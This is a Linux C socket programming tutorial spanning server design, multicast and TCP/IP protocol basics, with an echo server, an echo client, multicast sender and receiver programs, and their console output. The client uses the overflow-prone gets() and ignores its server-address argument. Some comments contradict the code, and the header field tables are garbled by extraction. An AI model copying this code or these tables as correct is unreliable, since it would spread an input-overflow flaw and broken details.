Waiting a reply from UDP server... UDP client received the following: "Hello! A client request message lol!" message from port 3333, address 203.106.93.94 [bodo@bakawali testsocket]$ Well, our udp server and client communicated successfully. The following are the expected messages at server console. [bodo@bakawali testsocket]$ ./udpserver UDP server - socket() is OK UDP server - try to bind... UDP server - bind() is OK Using IP 0.0.0.0 and port 3333 UDP server - Listening... UDP Server - recvfrom() is OK... UDP Server received the following: "Hello! A client request message lol!" message from port 32824 and address 203.106.93.94. UDP Server replying to the stupid UDP client... UDP Server - sendto() is OK... [bodo@bakawali testsocket]$

NETWORK PROGRAMMING LINUX SOCKET PART 12: SERVER DESIGN


Working program examples if any compiled using gcc, tested using the public IPs, run on Linux Fedora 3 with several times update, as normal user. The Fedora machine used for the testing having the "No Stack Execute"disabled and the SELinux set to default configuration. All the program example is generic. Beware codes that expand more than one line. Connection-oriented server designs There are a number of ways that you can design a connection-oriented socket server. While additional socket server designs are possible, the designs provided in the examples below are the most common: Note: A worker job or a worker thread refers to a process or sub-process (thread) that does data processing by using the socket descriptor. For example, a worker process accesses a database file to extract and format information for sending to the remote peer through the socket descriptor and its associated connection. It could then receive a response or set of data from the remote peer and update the database accordingly. Depending on the design of the server, the worker usually does not perform the connection "bring-up" or initiation. This is usually done by the listening or server job or thread. The listening or server job usually passes the descriptor to the worker job or thread. Iterative server

In the iterative server example, a single server job handles all incoming connections and all data flows with the client jobs. When the accept() API completes, the server handles the entire transaction. This is the easiest server to develop, but it does have a few problems. While the server is handling the request from a given client, additional clients could be trying to get to the server. These requests fill the listen() backlog and some of them will be rejected eventually. All of the remaining examples are concurrent server designs. In these designs, the system uses multiple jobs and threads to handle the incoming connection requests. With a concurrent server there are usually multiple clients that connect to the server at the same time. spawn() server and spawn() worker The spawn() server and spawn() worker example uses the spawn() API to create a new job (often called a "child job") to handle each incoming request. After spawn() completes, the server can then wait on the accept() API for the next incoming connection to be received. The only problem with this server design is the performance overhead of creating a new job each time a connection is received. You can avoid the performance overhead of the spawn() server example by using prestarted jobs. Instead of creating a new job each time a connection is received, the incoming connection is given to a job that is already active. If the child job is already active, thesendmsg() and recvmsg() APIs. sendmsg() server and recvmsg() worker Servers that use sendmsg() and recvmsg() APIs to pass descriptors remain unhindered during heavy activity. They do not need to know which worker job is going to handle each incoming connection. When a server callssendmsg(), the descriptor for the incoming connection and any control data are put in an internal queue for theAF_UNIX socket. When a worker job becomes available, it calls recvmsg() and receives the first descriptor and the control data that was in the queue. An example of how you can use the sendmsg() API to pass a descriptor to a job that does not exist, a server can do the following: 1. Use the socketpair() API to create a pair of AF_UNIX sockets. 2. Use the sendmsg() API to send a descriptor over one of the AF_UNIX sockets created by socketpair(). 3. Call spawn() to create a child job that inherits the other end of the socket pair. The child job calls recvmsg() to receive the descriptor that the server passed. The child job was not active when the server called sendmsg(). The sendmsg() and recvmsg() APIs are extremely flexible. You can use these APIs to send data buffers, descriptors, or both. Multiple accept() servers and multiple accept() workers In the previous examples, the worker job did not get involved until after the server received the incoming connection request. The multiple accept() servers and

multiple accept() workers example of the system turns each of the worker jobs into an iterative server. The server job still calls the socket(), bind(), and listen() APIs. When the listen() call completes, the server creates each of the worker jobs and gives a listening socket to each one of them. All of the worker jobs then call the accept() API. When a client tries to connect to the server, only one accept() call completes, and that worker handles the connection. This type of design removes the need to give the incoming connection to a worker job, and saves the performance overhead that is associated with that operation. As a result, this design has the best performance. A worker job or a worker thread refers to a process or sub-process (thread) that does data processing by using the socket descriptor. For example, a worker process accesses a database file to extract and format information for sending to the remote peer through the socket descriptor and its associated connection. It could then receive a response or set of data from the remote peer and update the database accordingly. Depending on the design of the server, the worker usually does not perform the connection "bring-up" or initiation. This is usually done by the listening or server job or thread. The listening or server job usually passes the descriptor to the worker job or thread. Example: Writing an iterative server program This example shows how you can write an iterative server program. The following simple figure illustrates how the server and client jobs interact when the system used the iterative server design.

Figure 1: An example of socket APIs used for iterative server design. In the following example of the server program, the number of incoming connections that the server allows depends on the first parameter that is passed to the server. The default is for the server to allow only one connection. /**** iserver.c ****/ #include <stdio.h> #include <stdlib.h> #include <sys/socket.h> #include <netinet/in.h> #define SERVER_PORT 12345 /* Run with a number of incoming connection as argument */ int main(int argc, char *argv[]) { int i, len, num, rc; int listen_sd, accept_sd; /* Buffer for data */ char buffer[100]; struct sockaddr_in addr; /* If an argument was specified, use it to */ /* control the number of incoming connections */ if(argc >= 2) num = atoi(argv[1]); /* Prompt some message */ else { printf("Usage: %s <The_number_of_client_connection else 1 will be used>\n", argv[0]); num = 1; } /* Create an AF_INET stream socket to receive */ /* incoming connections on */ listen_sd = socket(AF_INET, SOCK_STREAM, 0); if(listen_sd < 0) { perror("Iserver - socket() error"); exit(-1); } else printf("Iserver - socket() is OK\n"); printf("Binding the socket...\n"); /* Bind the socket */ memset(&addr, 0, sizeof(addr)); addr.sin_family = AF_INET; addr.sin_addr.s_addr = htonl(INADDR_ANY);

addr.sin_port = htons(SERVER_PORT); rc = bind(listen_sd, (struct sockaddr *)&addr, sizeof(addr)); if(rc < 0) { perror("Iserver - bind() error"); close(listen_sd); exit(-1); } else printf("Iserver - bind() is OK\n"); /* Set the listen backlog */ rc = listen(listen_sd, 5); if(rc < 0) { perror("Iserver - listen() error"); close(listen_sd); exit(-1); } else printf("Iserver - listen() is OK\n"); /* Inform the user that the server is ready */ printf("The Iserver is ready!\n"); /* Go through the loop once for each connection */ for(i=0; i < num; i++) { /* Wait for an incoming connection */ printf("Iteration: #%d\n", i+1); printf(" waiting on accept()\n"); accept_sd = accept(listen_sd, NULL, NULL); if(accept_sd < 0) { perror("Iserver - accept() error"); close(listen_sd); exit(-1); } else printf("accept() is OK and completed successfully!\n"); /* Receive a message from the client */ printf("I am waiting client(s) to send message(s) to me...\n"); rc = recv(accept_sd, buffer, sizeof(buffer), 0); if(rc <= 0) { perror("Iserver - recv() error"); close(listen_sd); close(accept_sd);

exit(-1); } else printf("The message from client: \"%s\"\n", buffer); /* Echo the data back to the client */ printf("Echoing it back to client...\n"); len = rc; rc = send(accept_sd, buffer, len, 0); if(rc <= 0) { perror("Iserver - send() error"); close(listen_sd); close(accept_sd); exit(-1); } else printf("Iserver - send() is OK.\n"); /* Close the incoming connection */ close(accept_sd); } /* Close the listen socket */ close(listen_sd); return 0; }
Compile and link. [bodo@bakawali testsocket]$ gcc -g iserver.c -o iserver Run the server program. [bodo@bakawali testsocket]$ ./iserver Usage: ./iserver <The_number_of_client_connection else 1 will be used> Iserver - socket() is OK Binding the socket... Iserver - bind() is OK Iserver - listen() is OK The Iserver is ready! Iteration: #1 waiting on accept()

The server is waiting the connections from clients. The following program example is a client program. Example: Connection-oriented common client This example provides the code for the client job. The client job does a socket(), connect(), send(), recv(), and close(). The client job is not aware that the data buffer it sent and received is going to a worker job rather than to the server. This client job program can also be used to work with other previous connectionoriented server program examples.

/****** comclient.c ******/ #include <stdio.h> #include <stdlib.h> #include <sys/socket.h> #include <netinet/in.h> /* Our server port as in the previous program */ #define SERVER_PORT 12345 main (int argc, char *argv[]) { int len, rc; int sockfd; char send_buf[100]; char recv_buf[100]; struct sockaddr_in addr; if(argc !=2) { printf("Usage: %s <Server_name or Server_IP_address>\n", argv[0]); exit (-1); } /* Create an AF_INET stream socket */ sockfd = socket(AF_INET, SOCK_STREAM, 0); if(sockfd < 0) { perror("client - socket() error"); exit(-1); } else printf("client - socket() is OK.\n"); /* Initialize the socket address structure */ memset(&addr, 0, sizeof(addr)); addr.sin_family = AF_INET; addr.sin_addr.s_addr = htonl(INADDR_ANY); addr.sin_port = htons(SERVER_PORT); /* Connect to the server */ rc = connect(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr_in)); if(rc < 0) { perror("client - connect() error"); close(sockfd); exit(-1); } else {

printf("client - connect() is OK.\n"); printf("connect() completed successfully.\n"); printf("Connection with %s using port %d established!\n", argv[1], SERVER_PORT); } /* Enter data buffer that is to be sent */ printf("Enter message to be sent to server:\n"); gets(send_buf); /* Send data buffer to the worker job */ len = send(sockfd, send_buf, strlen(send_buf) + 1, 0); if(len != strlen(send_buf) + 1) { perror("client - send() error"); close(sockfd); exit(-1); } else printf("client - send() is OK.\n"); printf("%d bytes sent.\n", len); /* Receive data buffer from the worker job */ len = recv(sockfd, recv_buf, sizeof(recv_buf), 0); if(len != strlen(send_buf) + 1) { perror("client - recv() error"); close(sockfd); exit(-1); } else { printf("client - recv() is OK.\n"); printf("The sent message: \"%s\" successfully received by server and echoed back to client!\n", recv_buf); printf("%d bytes received.\n", len); } /* Close the socket */ close(sockfd); return 0; }
Compile and link [bodo@bakawali testsocket]$ gcc -g comclient.c -o comclient /tmp/ccG1hQSw.o(.text+0x171): In function `main': /home/bodo/testsocket/comclient.c:53: warning: the `gets' function is dangerous and should not be used.

You may want to change the gets() to the secure version, gets_s(). Run the program and make sure you run the server program as in the previous program example.

[bodo@bakawali testsocket]$ ./comclient Usage: ./comclient <Server_name or Server_IP_address> [bodo@bakawali testsocket]$ ./comclient bakawali client - socket() is OK. client - connect() is OK. connect() completed successfully. Connection with bakawali using port 12345 established! Enter message to be sent to server: This is a test message from a stupid client lol! client - send() is OK. 49 bytes sent. client - recv() is OK. The sent message: "This is a test message from a stupid client lol!" successfully received by server and echoed back to client! 49 bytes received. [bodo@bakawali testsocket]$
And the message at the server console. [bodo@bakawali testsocket]$ ./iserver Usage: ./iserver <The_number_of_client_connection else 1 will be used> Iserver - socket() is OK Binding the socket... Iserver - bind() is OK Iserver - listen() is OK The Iserver is ready! Iteration: #1 waiting on accept() accept() is OK and completed successfully! I am waiting client(s) to send message(s) to me... The message from client: "This is a test message from a stupid client lol!" Echoing it back to client... Iserver - send() is OK. [bodo@bakawali testsocket]$

Let try more than 1 connection. Firstly, run the server. [bodo@bakawali testsocket]$ ./iserver 2 Iserver - socket() is OK Binding the socket... Iserver - bind() is OK Iserver - listen() is OK The Iserver is ready! Iteration: #1 waiting on accept() Then run the client twice. [bodo@bakawali testsocket]$ ./comclient bakawali client - socket() is OK.

client - connect() is OK. connect() completed successfully. Connection with bakawali using port 12345 established! Enter message to be sent to server: Test message #1 client - send() is OK. 16 bytes sent. client - recv() is OK. The sent message: "Test message #1" successfully received by server and echoed back to client! 16 bytes received. [bodo@bakawali testsocket]$ ./comclient bakawali client - socket() is OK. client - connect() is OK. connect() completed successfully. Connection with bakawali using port 12345 established! Enter message to be sent to server: Test message #2 client - send() is OK. 16 bytes sent. client - recv() is OK. The sent message: "Test message #2" successfully received by server and echoed back to client! 16 bytes received. [bodo@bakawali testsocket]$ The message on the server console. [bodo@bakawali testsocket]$ ./iserver 2 Iserver - socket() is OK Binding the socket... Iserver - bind() is OK Iserver - listen() is OK The Iserver is ready! Iteration: #1 waiting on accept() accept() is OK and completed successfully! I am waiting client(s) to send message(s) to me... The message from client: "Test message #1" Echoing it back to client... Iserver - send() is OK. Iteration: #2 waiting on accept() accept() is OK and completed successfully! I am waiting client(s) to send message(s) to me... The message from client: "Test message #2" Echoing it back to client... Iserver - send() is OK. [bodo@bakawali testsocket]$

NETWORK PROGRAMMING LINUX SOCKET PART 13: MULTICAST


Working program examples if any compiled using gcc, tested using the public IPs, run on Linux Fedora 3 with several times update, as normal user. The Fedora machine used for the testing having the "No Stack Execute"disabled and the SELinux set to default configuration. All the program example is generic. Beware codes that expand more than one line. Example: Sending and receiving a multicast datagram IP multicasting provides the capability for an application to send a single IP datagram that a group of hosts in a network can receive. The hosts that are in the group may reside on a single subnet or may be on different subnets that have been connected by multicast capable routers. Hosts may join and leave groups at any time. There are no restrictions on the location or number of members in a host group. A class D Internet address in the range 224.0.0.1 to 239.255.255.255 identifies a host group. An application program can send or receive multicast datagrams by using the socket() API and connectionless SOCK_DGRAM type sockets. Each multicast transmission is sent from a single network interface, even if the host has more than one multicasting-capable interface. It is a one-to-many transmission method. You cannot use connection-oriented sockets of type SOCK_STREAM for multicasting. When a socket of type SOCK_DGRAM is created, an application can use the setsockopt() function to control the multicast characteristics associated with that socket. The setsockopt() function accepts the following IPPROTO_IP level flags: 1. IP_ADD_MEMBERSHIP: Joins the multicast group specified. 2. IP_DROP_MEMBERSHIP: Leaves the multicast group specified. 3. IP_MULTICAST_IF: Sets the interface over which outgoing multicast datagrams are sent. 4. IP_MULTICAST_TTL: Sets the Time To Live (TTL) in the IP header for outgoing multicast datagrams. By default it is set to 1. TTL of 0 are not transmitted on any sub-network. Multicast datagrams with a TTL of greater than 1 may be delivered to more than one sub-network, if there are one or more multicast routers attached to the first sub-network. 5. IP_MULTICAST_LOOP: Specifies whether or not a copy of an outgoing multicast datagram is delivered to the sending host as long as it is a member of the multicast group. The following examples enable a socket to send and receive multicast datagrams. The steps needed to send a multicast datagram differ from the steps needed to receive a multicast datagram. Example: Sending a multicast datagram, a server program The following example enables a socket to perform the steps listed below and to send multicast datagrams: 1. Create an AF_INET, SOCK_DGRAM type socket.

2. Initialize a sockaddr_in structure with the destination group IP address and port number. 3. Set the IP_MULTICAST_LOOP socket option according to whether the sending system should receive a copy of the multicast datagrams that are transmitted. 4. Set the IP_MULTICAST_IF socket option to define the local interface over which you want to send the multicast datagrams. 5. Send the datagram. [bodo@bakawali testsocket]$ cat mcastserver.c /* Send Multicast Datagram code example. */ #include <sys/types.h> #include <sys/socket.h> #include <arpa/inet.h> #include <netinet/in.h> #include <stdio.h> #include <stdlib.h> struct in_addr localInterface; struct sockaddr_in groupSock; int sd; char databuf[1024] = "Multicast test message lol!"; int datalen = sizeof(databuf); int main (int argc, char *argv[ ]) { /* Create a datagram socket on which to send. */ sd = socket(AF_INET, SOCK_DGRAM, 0); if(sd < 0) { perror("Opening datagram socket error"); exit(1); } else printf("Opening the datagram socket...OK.\n"); /* Initialize the group sockaddr structure with a */ /* group address of 225.1.1.1 and port 5555. */ memset((char *) &groupSock, 0, sizeof(groupSock)); groupSock.sin_family = AF_INET; groupSock.sin_addr.s_addr = inet_addr("226.1.1.1"); groupSock.sin_port = htons(4321); /* Disable loopback so you do not receive your own datagrams. { char loopch = 0; if(setsockopt(sd, IPPROTO_IP, IP_MULTICAST_LOOP, (char *)&loopch, sizeof(loopch)) < 0) {

perror("Setting IP_MULTICAST_LOOP error"); close(sd); exit(1); } else printf("Disabling the loopback...OK.\n"); } */ /* Set local interface for outbound multicast datagrams. */ /* The IP address specified must be associated with a local, */ /* multicast capable interface. */ localInterface.s_addr = inet_addr("203.106.93.94"); if(setsockopt(sd, IPPROTO_IP, IP_MULTICAST_IF, (char *)&localInterface, sizeof(localInterface)) < 0) { perror("Setting local interface error"); exit(1); } else printf("Setting the local interface...OK\n"); /* Send a message to the multicast group specified by the*/ /* groupSock sockaddr structure. */ /*int datalen = 1024;*/ if(sendto(sd, databuf, datalen, 0, (struct sockaddr*)&groupSock, sizeof(groupSock)) < 0) {perror("Sending datagram message error");} else printf("Sending datagram message...OK\n"); /* Try the re-read from the socket if the loopback is not disable if(read(sd, databuf, datalen) < 0) { perror("Reading datagram message error\n"); close(sd); exit(1); } else { printf("Reading datagram message from client...OK\n"); printf("The message is: %s\n", databuf); } */ return 0; }

Compile and link the program.

[bodo@bakawali testsocket]$ gcc -g mcastserver.c -o mcastserver Before running this multicaster program, you have to run the client program first as in the following. Example: Receiving a multicast datagram, a client The following example enables a socket to perform the steps listed below and to receive multicast datagrams: 1. Create an AF_INET, SOCK_DGRAM type socket. 2. Set the SO_REUSEADDR option to allow multiple applications to receive datagrams that are destined to the same local port number. 3. Use the bind() verb to specify the local port number. Specify the IP address as INADDR_ANY in order to receive datagrams that are addressed to a multicast group. 4. Use the IP_ADD_MEMBERSHIP socket option to join the multicast group that receives the datagrams. When joining a group, specify the class D group address along with the IP address of a local interface. The system must call the IP_ADD_MEMBERSHIP socket option for each local interface receiving the multicast datagrams. 5. Receive the datagram. /* Receiver/client multicast Datagram example. */ #include <sys/types.h> #include <sys/socket.h> #include <arpa/inet.h> #include <netinet/in.h> #include <stdio.h> #include <stdlib.h> struct sockaddr_in localSock; struct ip_mreq group; int sd; int datalen; char databuf[1024]; int main(int argc, char *argv[]) { /* Create a datagram socket on which to receive. */ sd = socket(AF_INET, SOCK_DGRAM, 0); if(sd < 0) { perror("Opening datagram socket error"); exit(1); } else printf("Opening datagram socket....OK.\n"); /* Enable SO_REUSEADDR to allow multiple instances of this */ /* application to receive copies of the multicast datagrams. */

{ int reuse = 1; if(setsockopt(sd, SOL_SOCKET, SO_REUSEADDR, (char *)&reuse, sizeof(reuse)) < 0) { perror("Setting SO_REUSEADDR error"); close(sd); exit(1); } else printf("Setting SO_REUSEADDR...OK.\n"); } /* Bind to the proper port number with the IP address */ /* specified as INADDR_ANY. */ memset((char *) &localSock, 0, sizeof(localSock)); localSock.sin_family = AF_INET; localSock.sin_port = htons(4321); localSock.sin_addr.s_addr = INADDR_ANY; if(bind(sd, (struct sockaddr*)&localSock, sizeof(localSock))) { perror("Binding datagram socket error"); close(sd); exit(1); } else printf("Binding datagram socket...OK.\n"); /* Join the multicast group 226.1.1.1 on the local 203.106.93.94 */ /* interface. Note that this IP_ADD_MEMBERSHIP option must be */ /* called for each local interface over which the multicast */ /* datagrams are to be received. */ group.imr_multiaddr.s_addr = inet_addr("226.1.1.1"); group.imr_interface.s_addr = inet_addr("203.106.93.94"); if(setsockopt(sd, IPPROTO_IP, IP_ADD_MEMBERSHIP, (char *)&group, sizeof(group)) < 0) { perror("Adding multicast group error"); close(sd); exit(1); } else printf("Adding multicast group...OK.\n"); /* Read from the socket. */ datalen = sizeof(databuf); if(read(sd, databuf, datalen) < 0)

{ perror("Reading datagram message error"); close(sd); exit(1); } else { printf("Reading datagram message...OK.\n"); printf("The message from multicast server is: \"%s\"\n", databuf); } return 0; }

Compile and link. [bodo@bakawali testsocket]$ gcc -g

mcastclient.c -o mcastclient

Run the client program. [bodo@bakawali testsocket]$ ./mcastclient Opening datagram socket....OK. Setting SO_REUSEADDR...OK. Binding datagram socket...OK. Adding multicast group...OK. Then run the server program. [bodo@bakawali testsocket]$ ./mcastserver Opening the datagram socket...OK. Setting the local interface...OK Sending datagram message...OK [bodo@bakawali testsocket]$

The messages on the client console are shown below. [bodo@bakawali testsocket]$ ./mcastclient Opening datagram socket....OK. Setting SO_REUSEADDR...OK. Binding datagram socket...OK. Adding multicast group...OK. Reading datagram message...OK. The message from multicast server is: "Multicast test message lol!" [bodo@bakawali testsocket]$

LINUX SOCKET PART 15 Advanced TCP/IP - The TCP/IP Protocols & RAW Socket
This is a continuation from Part III series, TCP & UDP Client-server program examples. Working program examples if any compiled using gcc, tested using the public IPs, run on Linux / Fedora Core 3, with several times of update, as root or SUID 0. The Fedora machine used for the testing having the "No Stack Execute"disabled and the SELinux set to default configuration. This Module will concentrate on the TCP/IP stack and will try to dig deeper till the packet level. Abilities that should be acquired for this session: Able to understand the 7 layers OSI stack. Able to understand the 4 layers TCP/IP stack/suite/layer. Able to understand protocols in TCP/IP stack. Able to find and appreciate the RFCs and Standards. Able to understand and use the RAW socket (vs cooked socket). Able to understand and use for good purposes of the useful network tools that can be developed using RAW socket. (Host-to-Host) Transport Layer The Transport layer has two major jobs: 1. It must subdivide user-sized data buffers into network layer sized datagrams, and 2. It must enforce any desired transmission control such as reliable delivery. The Transport layer is responsible for end-to-end data integrity. The two most important protocols in this layer are Transmission Control Protocol (TCP) and User Datagram Protocol (UDP). TCP provides reliable data delivery service with end-to-end error detection and correction and also enables hosts to maintain multiple, simultaneous connections. UDP provides low-overhead, connectionless datagram delivery service. Both protocols deliver data between the Application layer and the Internet layer. Applications programmers can choose whichever service is more appropriate for their specific applications. Protocols defined at this layer accept data from application

protocols running at the Application layer, encapsulate it in the protocol header, and deliver the data segment thus formed to the lower IP layer for routing. Unlike the IP protocol, the transport layer is aware of the identity of the ultimate user representative process. As such, the Transport layer, in the TCP/IP suite, embodies what data communications are all about: The delivering of information from an application on one computer to an application on another computer. User Datagram Protocol (UDP RFC768) Gives application programs direct access to a datagram delivery service, like the delivery service that IP provides. This allows applications to exchange messages over the network with a minimum of protocol overhead. UDP is an unreliable (it doesn't care about the quality if deliveries it make), connectionless (doesn't establish a connection on behalf of user applications) datagram protocol. Within your computer, UDP will deliver data correctly. UDP is used as a data transport service when the amount of data being transmitted is small, the overhead of creating connections and ensuring reliable delivery may be greater than the work of retransmitting the entire data set. Broadcast-oriented services use UDP, as do those in which repeated, out of sequence, or missed requests have no harmful side effects. Since no state is maintained for UDP transmission, it is ideal for repeated, short operations such as the Remote Procedure Call (RPC) protocol. UDP packets can arrive in any order. If there is a network bottleneck that drops packets, UDP packets may not arrive at all. It's up to the application built on UDP to determine that a packet was lost, and to resend it if necessary. NFS and NIS are built on top of UDP because of its speed and statelessness. While the performance advantages of a fast protocol are obvious, the stateless nature of UDP is equally important. Without state information in either the client or server, crash recovery is greatly simplified.

UDP is also the transport protocol for several well-known application-layer protocols, including Network File System (NFS), Simple Network Management Protocol (SNMP), Domain Name System (DNS), and Trivial File Transfer Protocol (TFTP). The following figure shows the UDP datagram format.

Figure 11: The UDP Datagram Format. A brief description:

Field Port (16 bits) on Port (16 bits) 16 bits)

ecksum (16 bits)

Description This field is optional and specifies the port number of the application that is originating the user da This is the port number pertaining to the destination application. This field describes the total length of the UDP datagram, including both data and header informa Integrity checking is optional under UDP. If turned on, this field is used by both ends of the communication channel for data integrity checks. Table 4: UDP fields description.

Well, let revised what we have already covered till now. The following figure is the TCP/IP stack mentioned before. When data is sent from a host to another host, depend on the application (protocols), it has to go through the layers. Every layer will encapsulate the appropriate header.

Figure 12: TCP/IP header encapsulation, illustrated vertically. To make it clearer, the following figure is a packet that horizontally rearranged of the previous figure. The Data... may also contain other upper protocol header, the Transport layer.

Figure 13: TCP/IP header encapsulation, illustrated horizontally. As an example, by assuming there is no other information inserted between the Transport and the Internetwork layers, the following figure shows the packet when the data has gone through the Transport and Internetwork layers.

Figure 14: The UDP and IP headers in a packet. From the above figure, what IP considers to be data field is in fact just another piece of formatted information including both UDP header and user protocol data. To IP it should not matter what the data field is hiding. The details of the header information for each protocol should clearly convey to the reader purpose of the protocol. Keep in mind that at machine level, all the fields in the packet actually just a combination of the 0s and 1s digits. Let continue with another important protocol in Transport layer, the TCP. Transmission Control Protocol (TCP) Transmission Control Protocol (TCP) is a required TCP/IP standard defined in RFC 793, "Transmission Control Protocol (TCP)", that provides a reliable, connection-oriented packet delivery service. The Transmission Control Protocol: 1. Guarantees delivery of IP datagrams. 2. Performs segmentation and reassembly of large blocks of data sent by programs. 3. Ensures proper sequencing and ordered delivery of segmented data. 4. Performs checks on the integrity of transmitted data by using checksum calculations. 5. Sends positive messages depending on whether data was received successfully. By using selective acknowledgments, negative acknowledgments for data not received are also sent. 6. Offers a preferred method of transport for programs that must use reliable session-based data transmission, such as client/server database and e-mail programs. It is fully reliable, connection-oriented, end-to-end packet delivery, acknowledged, byte stream protocol that provide consistency for data delivery across the network in a proper sequence. TCP supports data fragmentation and reassemble. It also support multiplexing/demultiplexing using source and destination port numbers in much the same way they are used by UDP. Together with the Internet Protocol (IP), TCP represents the heart of the Internet protocols. TCP provides reliability with a mechanism called Positive Acknowledgement with Retransmission (PAR). Simply said, a system using PAR resends the data, unless it hears from the remote system that

the data received is okay. The unit of data exchanged between co-operating TCP modules is called a segment. The following is a TCP segment format.

Figure 15: The segment format of the TCP Protocol. A brief field description: Description

ld 16 bits) ort (16 bits) mber (32

Specifies the port on the sending TCP module. Specifies the port on the receiving TCP module. Specifies the sequence position of the first data octet in the segment. When the segment opens a co sequence number is the Initial Sequence Number (ISN) and the first octet in the data field is at sequ ment number Specifies the next sequence number that is expected by the sender of the segment. TCP indicates th active by setting the ACK bit, which is always set after a connection is established. bits) Specifies the number of 32-bit word in the TCP header. its) Must be zero. Reserved for future use. The six control bits are as follow: 1. URG - When set, the Urgent Pointer field is significant. 2. ACK - When set, the acknowledgement Number field is significant. 3. PSH - Initiates a push function. bits) 4. RST - Forces a reset of the connection. 5. SYN - Synchronizes sequencing counters for the connection. This bit is set when a segment r opening of a connection. 6. FIN - No more data. Closes the connection.

its)

6 bits)

r (16 bits)

ble) able)

Specifies the number of octets, starting with the octet specified in the acknowledgement number field, sender of the segment can currently accept. An error control checksum that covers the header and data fields. It does not cover any padding requ the segment consists of an even number of octets. The checksum also covers a 96-pseudoheader a below; it includes source and destination addresses, the protocol, and the segment length. The inform forwarded with the segment to IP to protect TCP from miss-routed segments. The value of the segme field includes the TCP header and data, but doesnt include the length of the pseudoheader. Identifies the sequence number of the octet following urgent data. The urgent pointer is a positive off sequence number of the segment. Options are available for a variety of functions. 0-value octets are appended to the header to ensure that the header ends on a 32-bit word boundary

Table 5: TCP segment fields description.

Figure 16: The format of the TCP pseudoheader. TCP Three-Way Handshake Each segment contains a checksum that the recipient uses to verify that the data is undamaged. If the data segment is received undamaged, the receiver sends a positive acknowledgement back to the sender. If the data segment is damaged, the receiver discards it. After an appropriate time-out period, the sending TCP module retransmits any segment for which no positive acknowledgement has been received. TCP is connection-oriented. It establishes a logical end-to-end connection between the two communication hosts. Control information, called a handshake, is exchanged between the two endpoints to establish a dialogue before data is transmitted. TCP indicates the control function of a segment by setting the appropriate bit in the flags field of the segment header. The type of handshake used by TCP is called a three-way handshake because three segments are exchanged. The following figure illustrates the three-way handshake mechanism.

Figure 17: A Three-Way Handshake of the TCP initialization. The client who needs to initialize a connection sends out a SYN segment (Synchronize) to the server along with the initial sequence number. No data is sent during this process, and the SYN segment contains only TCP header and IP header. When the server receives the SYN segment, it acknowledges the request with its own SYN segment, called SYN-ACK segment. When the client receives the SYN-ACK, it sends an ACK for the server's SYN. At this stage the connection is "established." Unlike TCP connection initialization, which is a three-way process, connection termination takes place with the exchange of four-way packets. The following figure illustrates the TCP termination process.

1.

2.

3.

4.

Figure 18: A Four-Way of the TCP termination. The client who needs to terminate the connection sends a FIN segment to the server that is a TCP Packet with the FIN flag set, indicating that it has finished sending the data. The server, upon receiving the FIN segment, does not terminate the connection but enters into a "passive close" (CLOSE_WAIT) state and sends an ACK for the FIN back to the client with the sequence number incremented by one. Now the server enters intoLAST_ACK state. When the client gets the last ACK from the server, it enters into a TIME_WAIT state, and sends an ACK back to the server with the sequence number incremented by one. When the server gets the ACK from the client, it closes the connection.

Reliability and Acknowledgement TCP employs the positive acknowledgement with retransmission technique for the purpose of achieving reliability in service.

Figure 19: The positive acknowledgement with retransmission technique. Figure 19 illustrates a simple ladder diagram depicting the events taking place between two hosts. The arrows represent transmitted data and/or acknowledgements, and time

is represented by the vertical distance down the ladder. When TCP send a data segment, it requires an acknowledgement from the receiving end. The acknowledgement is used to update the connection state table. An acknowledgement can be positive or negative. A positive acknowledgement implies that the receiving host recovered the data and that it passed the integrity check. A negative acknowledgement implies that the failed data segment needs to be retransmitted. It can be caused by failures such as data corruption or loss.

Figure 20: TCP implementation of the time-out mechanism to keep track of loss segments. In figure 20, illustrates what happens when a packet is lost on the network and fails to reach its ultimate destination. When a host sends data, it starts a countdown timer. If the timer expires without receiving an acknowledgement, this host assumes that the data segment was lost. Consequently, this host retransmits a duplicate of the failing segment. TCP keep a copy of all transmitted data with outstanding positive acknowledgement. Only after receiving the positive acknowledgement is this copy discarded to make room for other data in its buffer. Data Stream Maintenance The interface between TCP and a local process is a port, which is a mechanism that enables the process to call TCP and in turn enables TCP to deliver data streams to the appropriate process. Ports are identified by port numbers. To fully specify a connection, the host IP address is appended to the port number. This combination of IP address and port number is called a socket. A given socket number is unique on the internetwork. A connection between two hosts is fully described by the sockets assigned to each end of the connection.

Figure 21: A TCP data stream that starts with an Initial Sequence Number (ISN) of 0. In figure 21, the receiving system has received and acknowledged 2000 bytes. So the current Acknowledgement Number is 2000. The receiver also has enough buffer space for another 6400 bytes, so it has advertised a Window of 6000. The sender is currently sending a segment of 1000 bytes starting with Sequence Number 4001. The sender has received no acknowledgement for the bytes from 2001 on, but continues sending data as long as it is within the window. If the sender fills the window and receives no acknowledgement of the data previously sent, it will, after an appropriate time-out, resend the data starting from the first unacknowledged byte. Retransmission would start from byte 2001 if no further acknowledgements are received. This procedure ensures that data is reliably received at the far end of the network. From the perspective of Applications, communication with the network involves sending and receiving continuous streams of data. It seems that the Application is not responsible for fragmenting the data to fit lower-layer protocols. The whole process can be illustrated in the following figure.

Figure 22: How data is processed as they travel down the protocol stack, through the network, and up the protocol stack of the receiver. Brief description: 1. TCP receives a stream of data from the upper-layer process. 2. TCP may fragment the data stream into segments that meet the maximum datagram size of IP. 3. IP may fragment segments as it prepares datagrams that are sized to conform to restrictions of the network types: Ethernet, Token Ring etc. 4. Network protocols transmit the datagram in the form of bits. 5. Network protocols at the receiving host reconstruct datagrams from the bits they receive. 6. IP receives datagrams from the network. Where necessary datagram fragments are reassembled to reconstruct the original segment. 7. TCP presents data in segments to upper-layer protocols in the form of data streams. Application Layer The Application layer includes all processes that use the transport layer protocols to deliver data. There are many applications protocols. A good example of concerns handled by these processes is the reconciliation of differences in the data syntax between the platforms on which the applications are running. It should be clear that unless this difference in data representation is handled properly, any exchange of data involving these processes id likely to yield erroneous interpretations of numerical data. To resolve this issue, and other similar issues, TCP/IP defines the eXternal Data

